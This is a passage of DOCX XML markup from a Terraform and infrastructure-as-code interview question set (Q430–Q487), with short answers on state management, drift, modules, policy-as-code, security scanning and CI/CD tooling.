        <w:t>Outputs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Q430. Explain locals.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform locals define named expressions used within a module. They reduce repetition and make complex derived values easier to read.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Locals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Q431. What is terraform import?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: terraform import brings an existing resource under Terraform state management. After import, configuration must be written to match the real resource.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Import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Q432. Explain taint in Terraform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Taint marked a resource for recreation in older Terraform workflows. Modern Terraform prefers terraform apply -replace to explicitly recreate resources.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Taint In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Q433. What is drift detection?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Drift detection compares real infrastructure with Terraform state and configuration. It identifies manual or external changes that may require remediation.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Drift Detection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Q434. Explain lifecycle rules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform lifecycle rules customize resource behavior, such as prevent_destroy, create_before_destroy, ignore_changes, and replace_triggered_by. They should be used carefully to avoid hiding important drift.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Lifecycle Rules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Q435. What is depends_on?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: depends_on explicitly defines a dependency when Terraform cannot infer it from references. It ensures resources are created, updated, or destroyed in the correct order.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Depends_on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Q436. Explain count vs for_each.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: count creates multiple resources by index, while for_each creates resources keyed by map or set values. for_each is usually safer when individual instances need stable identity.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Count Vs For_each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Q437. What is dynamic block?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A dynamic block generates nested configuration blocks programmatically from a collection. It is useful for repeated settings but can reduce readability if overused.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Dynamic Block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Q438. Explain Terraform graph.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: terraform graph outputs the dependency graph between resources. It helps understand ordering, dependencies, and complex module relationships.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Graph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Q439. What is state corruption?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: State corruption occurs when Terraform state becomes invalid, inconsistent, or damaged. Prevention includes remote state, locking, backups, controlled automation, and avoiding manual state edits.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>State Corruption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Q440. Explain Terraform Cloud.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform Cloud is HashiCorp’s managed platform for Terraform runs, state, policy checks, variables, private modules, and collaboration. It supports remote execution and governance workflows.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Cloud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Q441. What is Terraform Enterprise?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform Enterprise is the self-hosted enterprise version of Terraform Cloud. It provides governance, private execution, auditability, and collaboration features for regulated organizations.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Enterprise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Q442. Explain policy as code in Terraform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Policy as code in Terraform validates plans against rules before apply. Tools include Sentinel, OPA, Checkov, tfsec, and cloud-specific policy engines.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Policy As Code In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Q443. What is Sentinel?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Sentinel is HashiCorp’s policy-as-code framework used with Terraform Cloud and Enterprise. It can enforce rules on Terraform plans, modules, cost, and security.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Sentinel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Q444. Explain OpenTofu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: OpenTofu is an open-source fork of Terraform created after Terraform’s license change. It provides Terraform-compatible infrastructure-as-code workflows under an open-source license.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Opentofu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Q445. What is Terragrunt?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terragrunt is a wrapper around Terraform that helps manage remote state, DRY configuration, dependencies, and multi-environment deployments. It is often used in large Terraform estates.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terragrunt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Q446. Explain Terraform testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform testing validates modules and infrastructure behavior using unit tests, plan checks, policy checks, integration tests, and tools such as terraform test, Terratest, Kitchen Terraform, and Checkov.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Testing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Q447. What is infrastructure modularization?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Infrastructure modularization breaks IaC into reusable modules and environment compositions. It improves consistency, ownership, testing, and maintainability.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Infrastructure Modularization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Q448. Explain Terraform security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform security includes least-privilege provider credentials, protected state, secret handling, policy checks, module review, vulnerability scanning, and controlled apply workflows.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Security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Q449. What is secret handling in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Secrets in Terraform should not be hardcoded or committed. Use secret managers, sensitive variables, secure backends, limited state access, and avoid exposing secrets in outputs or logs.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Secret Handling In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Q450. Explain provider authentication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Provider authentication configures how Terraform authenticates to cloud or platform APIs. It should use short-lived credentials, service accounts, workload identity, or managed CI/CD identity where possible.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Provider Authentication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Q451. What is Terraform workspace isolation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform workspace isolation separates state per workspace but shares the same code directory. It can work for simple cases, but strong production isolation often uses separate backends, projects, or directories.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Workspace Isolation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Q452. Explain environment management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Environment management defines how dev, staging, and production infrastructure differ while remaining consistent. It uses variables, modules, separate state, policies, and promotion workflows.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Environment Management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Q453. What are Terraform anti-patterns?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform anti-patterns include manual cloud changes, local state in teams, huge monolithic states, secrets in state, unversioned modules, no plan review, and using provisioners for configuration management.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Anti-patterns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Q454. Explain state file security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform state can contain sensitive values, so it must be encrypted, access-controlled, backed up, and stored remotely. Outputs and variables should be marked sensitive when needed.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>State File Security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Q455. What is state migration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: State migration moves Terraform state between backends or reorganizes resources across states. It requires backups, locking, careful state mv/import operations, and validation plans.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>State Migration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Q456. Explain provider versioning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Provider versioning pins acceptable provider versions to avoid unexpected behavior changes. Teams should use required_providers and lock files, then upgrade intentionally.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Provider Versioning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Q457. What is Terraform locking issue?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Terraform locking issue occurs when state remains locked because of a failed or interrupted run. Resolve it by confirming no run is active, then safely releasing the lock through the backend mechanism.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Locking Issue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Q458. Explain partial applies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Partial applies happen when Terraform applies some changes but fails before completion. Recovery requires checking real resources, refreshing state, fixing the error, and rerunning plan/apply carefully.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Partial Applies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Q459. What is Terraform refresh?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform refresh updates state with real infrastructure values. Modern Terraform includes refresh during plan by default, while refresh-only plans can inspect drift without changing resources.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Refresh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Q460. Explain drift remediation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Drift remediation fixes differences between desired and actual infrastructure. Either update Terraform code to accept intentional changes or apply Terraform to restore the desired state.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Drift Remediation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Q461. What is immutable infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Immutable infrastructure replaces resources instead of modifying them in place. It improves consistency, rollback, and reproducibility but requires good automation and data migration planning.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Immutable Infrastructure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Q462. Explain Terraform with GCP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform with GCP uses the Google provider to manage projects, IAM, VPCs, GKE, Cloud Run, storage, BigQuery, and other services. State is often stored in a GCS backend with locking and IAM controls.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform With GCP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Q463. What is Terraform with AWS?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform with AWS uses the AWS provider to manage VPCs, EC2, IAM, EKS, RDS, S3, Lambda, and more. Production setups usually use remote state, provider version pins, and CI/CD approvals.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform With Aws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Q464. Explain Terraform with Azure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform with Azure uses the AzureRM provider to manage resource groups, VNets, AKS, storage, Key Vault, managed identities, and other Azure services. Authentication often uses service principals or managed identities.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform With Azure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Q465. What is Terraform registry?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform Registry hosts public and private providers and modules. It helps teams discover reusable infrastructure modules and versioned provider plugins.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Registry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Q466. Explain module publishing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Module publishing makes Terraform modules available through a registry or repository with versions, documentation, examples, and tests. It supports standardization across teams.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Module Publishing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Q467. What is infrastructure testing?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Infrastructure testing validates that infrastructure code is secure, correct, compliant, and functional. It includes static checks, policy checks, plan validation, and live integration tests.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Infrastructure Testing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Q468. Explain Kitchen Terraform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Kitchen Terraform is a testing framework for Terraform modules based on Test Kitchen. It can provision infrastructure, run tests, and destroy resources after validation.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Kitchen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Q469. What is tfsec?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: tfsec is a static analysis tool that scans Terraform code for security issues and misconfigurations. It helps catch risks before infrastructure is deployed.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Tfsec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Q470. Explain Checkov.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Checkov is an IaC scanning tool that checks Terraform, Kubernetes, CloudFormation, and other files against security and compliance policies. It is commonly used in CI/CD pipelines.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Checkov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Q471. What is IaC scanning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: IaC scanning checks infrastructure code for misconfigurations, security risks, policy violations, and compliance gaps before deployment.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>IaC Scanning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Q472. Explain policy enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Policy enforcement blocks or flags changes that violate standards. It can happen in CI/CD, Terraform plan review, Kubernetes admission, cloud organization policies, and runtime controls.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Policy Enforcement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Q473. What is bootstrap infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Bootstrap infrastructure creates the foundational resources needed to manage the rest of the platform, such as state buckets, CI/CD identities, networks, projects, and policy baselines.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Bootstrap Infrastructure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Q474. Explain multi-account IaC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Multi-account IaC manages infrastructure across separate cloud accounts, projects, or subscriptions. It requires clear state isolation, provider aliases, permissions, naming, and governance standards.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Multi-account IaC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Q475. What is multi-region deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Multi-region deployment provisions resources across multiple regions for resilience, latency, or compliance. IaC should standardize regional modules while handling failover and data replication needs.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Multi-region Deployment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Q476. Explain Terraform pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform pipelines automate fmt, validate, plan, policy scan, approval, apply, and post-deployment checks. Plans should be reviewed before apply, especially for production.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Pipelines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Q477. What is GitOps with Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GitOps with Terraform uses Git pull requests as the control point for infrastructure changes. Automation creates plans, reviewers approve, and controlled runners apply changes with audit trails.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>GitOps With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Q478. Explain Atlantis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Atlantis is an automation tool that runs Terraform plan and apply from pull request comments. It improves collaboration and review for Terraform changes.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Atlantis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Q479. What is Spacelift?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Spacelift is an infrastructure automation platform for Terraform, OpenTofu, Pulumi, and other IaC tools. It provides policy, drift detection, stack dependencies, approvals, and governance.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Spacelift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Q480. Explain Terraform performance optimization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform performance optimization includes reducing large state files, splitting modules, limiting unnecessary data sources, using targeted plans carefully, caching providers, and avoiding excessive dependency chains.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Performance Optimization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Q481. What is drift in cloud resources?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Drift in cloud resources means deployed resources differ from the IaC definition because of manual changes, external automation, or provider-side changes. It should be detected and reconciled regularly.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Drift In Cloud Resources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Q482. Explain cost optimization with Terraform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cost optimization with Terraform includes rightsized modules, tagging, budget resources, lifecycle policies, autoscaling, spot/preemptible options, and policy checks that prevent expensive defaults.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cost Optimization With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Q483. What is tagging strategy?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A tagging strategy defines required labels for ownership, environment, application, cost center, compliance, and lifecycle. It enables cost allocation, automation, search, and governance.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Tagging Strategy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Q484. Explain Terraform debugging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform debugging uses validate, plan, TF_LOG, provider logs, state inspection, graph, console, and smaller reproduction cases. Always protect state and credentials while debugging.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Debugging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Q485. What is HCL?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: HCL, or HashiCorp Configuration Language, is the declarative language used by Terraform. It supports blocks, attributes, expressions, variables, functions, and modules.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Hcl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Q486. Explain resource graph dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform builds a resource dependency graph to determine creation, update, and destruction order. Dependencies come from references and explicit depends_on rules.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Resource Graph Dependencies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Q487. What is data source?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
